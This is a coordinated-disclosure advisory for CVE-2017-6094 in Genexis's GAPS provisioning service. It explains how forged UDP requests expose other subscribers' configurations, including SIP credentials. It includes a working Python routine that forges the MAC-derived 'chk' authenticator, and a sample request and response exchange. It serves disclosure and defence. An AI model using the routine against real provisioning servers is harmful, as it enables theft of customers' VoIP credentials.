################################################################################
#                                                                              #
# CVE-2017-6094 - Genexis GAPS Access Control Vulnerability                    #
#                                                                              #
################################################################################
#                                                                              #
# Product:   Genexis Automatic Provisioning System (GAPS)                      #
# Vendor:    Genexis B.V.                                                      #
# CVE ID:    CVE-2017-6094                                                     #
# Subject:   Access control vulnerability                                      #
# Effect:    Leaked configuration settings, including user credentials         #
# Author:    Antoine Neuenschwander <antoine@schoggi.org>                      #
# Date:      2017-12-18                                                        #
#                                                                              #
################################################################################


Vendor/product description:
-----------------------------
Genexis develops FTTH equipment for the optical distribution networks of ISPs
including customer premises equipment (CPE) as well as infrastructure
components, supporting triple-play services (broadband internet, IPTV and VoIP).
The Genexis Automatic Provisioning System (GAPS) is the service used to monitor,
configure and update the CPEs.
URL: https://genexis.eu/product/gaps/

Introduction:
-------------
Management of Genexis CPEs can be done using TR-069 or DHCP/TFTP in combination
with  UDP-based CPE commands. The CPE checks for most recent settings at startup
and performs periodic update checks. GAPS provides the configuration settings
for individual CPEs based on the device's MAC address. A configuration record
includes the following settings (among other):
 - tftp server address, used to retrieve firmware images
 - ingress and egress bitrates, according to the user's subscription
 - sip server address, used to register to a VoIP service
 - sip client credentials, used to authenticate the VoIP client
 - ...
Given the MAC address, it was found possible to retrieve the configuration
settings of other subscribers' CPEs by sending forged UDP packets to GAPS. As a
result, sensitive data such as the sip credentials are exposed.

Affected:
---------
This issue affects all versions up to 7.2.  First mitigations available after
version 6.1.

Technical Description:
----------------------
A CPE identifies itself by the MAC address of its WAN interface and a certain
"chk" value (48bit) derived from the MAC. The algorithm used to compute the
"chk" was disclosed by reverse engineering the CPE's firmware (retrieved from
the tftp server). It is possible to forge valid "chk" values for any given MAC
address using the following python routine:

def chk(mac):
    a = [int(x, 16) for x in mac.split(':', 6)]
    chk = [0] * 6

    chk[5] = 1*a[0] + 3*a[1] + 7*a[2]                            + 115 & 0xff
    chk[3] =          7*a[1] + 1*a[2] + 3*a[3]                   + 101 & 0xff
    chk[0] =                   3*a[2] + 7*a[3] + 1*a[4]          +  99 & 0xff
    chk[4] =                            1*a[3] + 3*a[4] + 7*a[5] + 114 & 0xff
    chk[1] = 3*a[0]                            + 7*a[4] + 1*a[5] + 101 & 0xff
    chk[2] = 7*a[0] + 1*a[1]                            + 3*a[5] + 116 & 0xff

    return ':'.join(['{:02x}'.format(x) for x in chk])

Example UDP message exchange (CPE <-> GAPS):
--------------------------------------------

> mac=000f9461cafe
> chk=90e97d8523ac
> type=OCG1018MX
> hw=0
> fw=OCG1018MX.v1.10.0.10c.bin
> stage=0

< vlan_mmt=62241
< vlan_voice=58146
< vlan_p1=33572
< defpri=0000000000000000
< vlansp1=8324
< prip1=00
< userid0=<phonenr>
< authid0=<userid>
< passwd0=<password>
< clip0=1
< clir0=0
< callwait0=0
< conference0=0
< clip1=0
< clir1=0
< callwait1=0
< conference1=0
< tftp_server=10.21.0.7
< tftp_server_port=69
< storecfg=0
< sip_server=<sip provider ip>
< sip_server_port=5060
< ratecount=3
< reg_exp=4
< country=ch
< send_dtmf=1
< sendflash=0
< dialplan=4|0[2-7]1[^]8|0[89]1[^]8|18[0-9]2|16[0-9]1|[^]+
< cliptype=1
< erate_p1=300
< versionOCG1018MX=OCG1018MX.v1.10.0.10c.bin
< erate_wan=300
< irate=012c0000000000000000000000000000
< erate=012c0000000000000000000000000000

Workaround / Fix:
-----------------
As of GAPS 6.2, GAPS provides a workaround to limit CPE requests. To further
improve security, it is advised to use MACless provisioning with random postfix
to harden the workaround.
Starting with GAPS 7.3, the GAPS protocol will support a mechanism to prevent
calculated checksums to be be valid.

Timeline:
---------
2017-01-13:    Found vulnerability
2017-01-16:    Contacted ISP
2017-01-17:    ISP confirms vulnerability and contacts vendor
2017-01-18:    Vendor confirms vulnerability
2017-02-13:    CVE-ID requested
2017-02-19:    CVE-ID assigned
2017-05-19:    Vendor agrees on disclosure date: 2017-07-03
2017-06-23:    Vendor postpones disclosure date: 2017-09-01
2017-07-31:    Vendor postpones disclosure date: 2017-12-18
2017-12-18:    Coordinated disclosure